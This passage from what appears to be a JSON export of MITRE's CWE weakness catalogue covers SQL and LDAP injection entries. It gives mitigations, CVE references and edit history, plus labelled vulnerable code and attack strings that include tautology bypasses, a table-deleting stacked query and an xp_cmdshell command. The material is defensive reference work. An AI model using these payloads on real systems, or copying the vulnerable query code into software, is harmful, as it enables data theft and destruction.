mysql_real_escape_string() API function is available in both C and PHP."]}},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When constructing SQL query strings, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping.","Note that proper output encoding, escaping, and quoting is the most effective solution for preventing SQL injection, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent SQL injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, the name \\"O\'Reilly\\" would likely pass the validation step, since it is a common last name in the English language. However, it cannot be directly inserted into the database because it contains the \\"\'\\" apostrophe character, which would need to be escaped or otherwise handled. In this case, stripping the apostrophe might reduce the risk of SQL injection, but it would produce incorrect behavior because the wrong name would be recorded.","When feasible, it may be safest to disallow meta-characters entirely, instead of escaping them. This will provide some defense in depth. After the data is entered into the database, later processes may neglect to escape meta-characters before use, and you may not have control over those processes."]}},{"attr":{"@_Mitigation_ID":"MIT-21"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":"When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs."},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.","In the context of SQL Injection, error messages revealing the structure of a SQL query can help attackers tailor successful attack strings."]}},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In 2008, a large number of web servers were compromised using the same SQL injection attack string. This single string worked against many different programs. The SQL injection was then used to modify the web sites to serve malicious code."},{"Intro_Text":"The following code dynamically constructs and executes a SQL query that searches for items matching a specified name. The query restricts the items displayed to those where owner matches the user name of the currently-authenticated user.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"...string userName = ctx.getAuthenticatedUserName();string query = \\"SELECT * FROM items WHERE owner = \'\\" + userName + \\"\' AND itemname = \'\\" + ItemName.Text + \\"\'\\";sda = new SqlDataAdapter(query, conn);DataTable dt = new DataTable();sda.Fill(dt);...","xhtml:br":["","","","","",""]}},{"attr":{"@_Nature":"informative"},"xhtml:div":"SELECT * FROM items WHERE owner = <userName> AND itemname = <itemName>;"},{"attr":{"@_Nature":"attack"},"xhtml:div":"name\' OR \'a\'=\'a"},{"attr":{"@_Nature":"attack"},"xhtml:div":"SELECT * FROM items WHERE owner = \'wiley\' AND itemname = \'name\' OR \'a\'=\'a\';"},{"attr":{"@_Nature":"attack"},"xhtml:div":"OR \'a\'=\'a"},{"attr":{"@_Nature":"attack"},"xhtml:div":"SELECT * FROM items;"}],"Body_Text":["The query that this code intends to execute follows:","However, because the query is constructed dynamically by concatenating a constant base query string and a user input string, the query only behaves correctly if itemName does not contain a single-quote character. If an attacker with the user name wiley enters the string:","for itemName, then the query becomes the following:","The addition of the:","condition causes the WHERE clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query:","This simplification of the query allows the attacker to bypass the requirement that the query only return items owned by the authenticated user; the query now returns all entries stored in the items table, regardless of their specified owner."]},{"Intro_Text":"This example examines the effects of a different malicious value passed to the query constructed and executed in the previous example.","Body_Text":["If an attacker with the user name wiley enters the string:","for itemName, then the query becomes the following two queries:","Many database servers, including Microsoft(R) SQL Server 2000, allow multiple SQL statements separated by semicolons to be executed at once. While this attack string results in an error on Oracle and other database servers that do not allow the batch-execution of statements separated by semicolons, on databases that do allow batch execution, this type of attack allows the attacker to execute arbitrary commands against the database.","Notice the trailing pair of hyphens (--), which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed. In this case the comment character serves to remove the trailing single-quote left over from the modified query. On a database where comments are not allowed to be used in this way, the general attack could still be made effective using a trick similar to the one shown in the previous example.","If an attacker enters the string","Then the following three valid statements will be created:","One traditional approach to preventing SQL injection attacks is to handle them as an input validation problem and either accept only characters from an allowlist of safe values or identify and escape a denylist of potentially malicious values. Allowlists can be a very effective means of enforcing strict input validation rules, but parameterized SQL statements require less maintenance and can offer more guarantees with respect to security. As is almost always the case, denylisting is riddled with loopholes that make it ineffective at preventing SQL injection attacks. For example, attackers can:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Target fields that are not quoted"},{"xhtml:div":"Find ways to bypass the need for certain escaped meta-characters"},{"xhtml:div":"Use stored procedures to hide the injected meta-characters."}]}},"Manually escaping characters in input to SQL queries can help, but it will not make your application secure from SQL injection attacks.","Another solution commonly proposed for dealing with SQL injection attacks is to use stored procedures. Although stored procedures prevent some types of SQL injection attacks, they do not protect against many others. For example, the following PL/SQL procedure is vulnerable to the same SQL injection attack shown in the first example.","Stored procedures typically help prevent SQL injection attacks by limiting the types of statements that can be passed to their parameters. However, there are many ways around the limitations and many interesting statements that can still be passed to stored procedures. Again, stored procedures can prevent some exploits, but they will not make your application secure against SQL injection attacks."],"Example_Code":[{"attr":{"@_Nature":"attack"},"xhtml:div":"name\'; DELETE FROM items; --"},{"attr":{"@_Nature":"attack","@_Language":"SQL"},"xhtml:div":{"#text":"SELECT * FROM items WHERE owner = \'wiley\' AND itemname = \'name\';DELETE FROM items;","xhtml:br":["","",""],"xhtml:i":"--\'"}},{"attr":{"@_Nature":"attack"},"xhtml:div":"name\'; DELETE FROM items; SELECT * FROM items WHERE \'a\'=\'a"},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"SELECT * FROM items WHERE owner = \'wiley\' AND itemname = \'name\';DELETE FROM items;SELECT * FROM items WHERE \'a\'=\'a\';","xhtml:br":["",""]}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"procedure get_item ( itm_cv IN OUT ItmCurTyp, usr in varchar2, itm in varchar2)is open itm_cv for\' SELECT * FROM items WHERE \' || \'owner = \'|| usr || \' AND itemname = \' || itm || \';end get_item;","xhtml:br":["","",""]}}]},{"Intro_Text":"MS SQL has a built in function that enables shell command execution. An SQL injection in such a context could be disastrous. For example, a query of the form:","Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:div":"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=\'$user_input\' ORDER BY PRICE"},{"attr":{"@_Nature":"attack"},"xhtml:div":"\'; exec master..xp_cmdshell \'dir\' --"},{"attr":{"@_Nature":"attack"},"xhtml:div":"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=\'\'; exec master..xp_cmdshell \'dir\' --\' ORDER BY PRICE"}],"Body_Text":["Where $user_input is taken from an untrusted source.","If the user provides the string:","The query will take the following form:","Now, this query can be broken down into:",{"xhtml:ol":{"xhtml:li":[{"xhtml:div":"a first SQL query: SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=\'\';"},{"xhtml:div":"a second SQL query, which executes the dir command in the shell: exec master..xp_cmdshell \'dir\'"},{"xhtml:div":"an MS SQL comment: --\' ORDER BY PRICE"}]}},"As can be seen, the malicious input changes the semantics of the query into a query, a shell command execution and a comment."]},{"Intro_Text":"This code intends to print a message summary given the message ID.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$id = $_COOKIE[\\"mid\\"];mysql_query(\\"SELECT MessageID, Subject FROM messages WHERE MessageID = \'$id\'\\");","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"1432\' or \'1\' = \'1"},{"attr":{"@_Nature":"result"},"xhtml:div":"SELECT MessageID, Subject FROM messages WHERE MessageID = \'1432\' or \'1\' = \'1\'"},{"attr":{"@_Nature":"good","@_Language":"PHP"},"xhtml:div":{"#text":"$id = intval($_COOKIE[\\"mid\\"]);mysql_query(\\"SELECT MessageID, Subject FROM messages WHERE MessageID = \'$id\'\\");","xhtml:br":""}}],"Body_Text":["The programmer may have skipped any input validation on $id under the assumption that attackers cannot modify the cookie. However, this is easy to do with custom client code or even in the web browser.","While $id is wrapped in single quotes in the call to mysql_query(), an attacker could simply change the incoming mid cookie to:","This would produce the resulting query:","Not only will this retrieve message number 1432, it will retrieve all other messages.","In this case, the programmer could apply a simple modification to the code to eliminate the SQL injection:","However, if this code is intended to support multiple users with different message boxes, the code might also need an access control check (CWE-285) to ensure that the application user has the permission to see that message."]},{"Intro_Text":"This example attempts to take a last name provided by a user and enter it into a database.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$userKey = getUserID();$name = getUserInput();$name = allowList($name, \\"^a-zA-z\'-$\\");$query = \\"INSERT INTO last_names VALUES(\'$userKey\', \'$name\')\\";","xhtml:br":["","","","",""],"xhtml:i":"# ensure only letters, hyphens and apostrophe are allowed"}},"Body_Text":"While the programmer applies a allowlist to the user input, it has shortcomings. First of all, the user is still allowed to provide hyphens, which are used as comment structures in SQL. If a user specifies \\"--\\" then the remainder of the statement will be treated as a comment, which may bypass security logic. Furthermore, the allowlist permits the apostrophe, which is also a data / command separator in SQL. If a user supplies a name with an apostrophe, they may be able to alter the structure of the whole statement and even change control flow of the program, possibly accessing or modifying confidential information. In this situation, both the hyphen and apostrophe are legitimate characters for a last name and permitting them is required. Instead, a programmer may want to use a prepared statement or apply an encoding routine to the input to prevent any data / directive misinterpretations."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0366","Description":"chain: SQL injection in library intended for database authentication allows SQL injection and authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0366"},{"Reference":"CVE-2008-2790","Description":"SQL injection through an ID that was supposed to be numeric.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2790"},{"Reference":"CVE-2008-2223","Description":"SQL injection through an ID that was supposed to be numeric.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2223"},{"Reference":"CVE-2007-6602","Description":"SQL injection via user name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6602"},{"Reference":"CVE-2008-5817","Description":"SQL injection via user name or password fields.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5817"},{"Reference":"CVE-2003-0377","Description":"SQL injection in security product, using a crafted group name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0377"},{"Reference":"CVE-2008-2380","Description":"SQL injection in authentication library.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2380"},{"Reference":"CVE-2017-11508","Description":"SQL injection in vulnerability management and reporting tool, using a crafted password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11508"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"SQL injection"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"SQL Injection"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"SQL injection"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A2","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":19,"Entry_Name":"SQL Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-89"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"IDS00-J","Entry_Name":"Prevent SQL injection","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"108"}},{"attr":{"@_CAPEC_ID":"109"}},{"attr":{"@_CAPEC_ID":"110"}},{"attr":{"@_CAPEC_ID":"470"}},{"attr":{"@_CAPEC_ID":"66"}},{"attr":{"@_CAPEC_ID":"7"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 1: SQL Injection." Page 3"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 12, "Database Input Issues" Page 397"}},{"attr":{"@_External_Reference_ID":"REF-867"}},{"attr":{"@_External_Reference_ID":"REF-868"}},{"attr":{"@_External_Reference_ID":"REF-869"}},{"attr":{"@_External_Reference_ID":"REF-870"}},{"attr":{"@_External_Reference_ID":"REF-871"}},{"attr":{"@_External_Reference_ID":"REF-872"}},{"attr":{"@_External_Reference_ID":"REF-873"}},{"attr":{"@_External_Reference_ID":"REF-874"}},{"attr":{"@_External_Reference_ID":"REF-875"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "SQL Queries", Page 431"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, "SQL Injection", Page 1061"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-89"}}]},"Notes":{"Note":{"#text":"SQL injection can be resultant from special character mismanagement, MAID, or denylist/allowlist problems. It can be primary to authentication errors.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Modes_of_Introduction, Name, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Name, Related_Attack_Patterns"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Name, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Likelihood_of_Exploit, Modes_of_Introduction, Observed_Examples, References, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"SQL Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Data into SQL Queries (aka \'SQL Injection\')","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Sanitize Data within SQL Queries (aka \'SQL Injection\')","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Preserve SQL Query Structure (aka \'SQL Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Preserve SQL Query Structure (\'SQL Injection\')","attr":{"@_Date":"2009-07-27"}},{"#text":"Improper Sanitization of Special Elements used in an SQL Command (\'SQL Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"90":{"attr":{"@_ID":"90","@_Name":"Improper Neutralization of Special Elements used in an LDAP Query (\'LDAP Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software constructs all or part of an LDAP query using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended LDAP query when it is sent to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"943","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Database Server","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Execute Unauthorized Code or Commands","Read Application Data","Modify Application Data"],"Note":"An attacker could include input that changes the LDAP query which allows unintended commands or code to be executed, allows sensitive data to be read or modified or causes other unintended behavior."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The code below constructs an LDAP query using user input address data:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"context = new InitialDirContext(env);String searchFilter = \\"StreetAddress=\\" + address;NamingEnumeration answer = context.search(searchBase, searchFilter, searchCtls);","xhtml:br":["",""]}},"Body_Text":"Because the code fails to neutralize the address string used to construct the query, an attacker can supply an address that includes additional LDAP queries."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-2301","Description":"Server does not properly escape LDAP queries, which allows remote attackers to cause a DoS and possibly conduct an LDAP injection attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2301"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"LDAP injection"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A2","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":29,"Entry_Name":"LDAP Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"136"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-879"}}},"Notes":{"Note":[{"#text":"Factors: resultant to special character mismanagement, MAID, or denylist/allowlist problems. Can be primary to authentication and verification errors.","attr":{"@_Type":"Relationship"}},{"#text":"Under-reported. This is likely found very frequently by third party code auditors, but there are very few publicly reported examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"LDAP Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Data into LDAP Queries (aka \'LDAP Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize Data into LDAP Queries (\'LDAP Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"91":{"attr":{"@_ID":"91","@_Name":"XML Injection (aka Blind XPath Injection)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly neutralize special elements that are used in XML, allowing attackers to modify the syntax, content, or commands of the XML before it is processed by an end system.","Extended_Description":"Within XML, special elements could include reserved words or characters such as \\"<\\", \\">\\", \\"\\"\\", and \\"&\\", which could then be used to add new data or modify XML 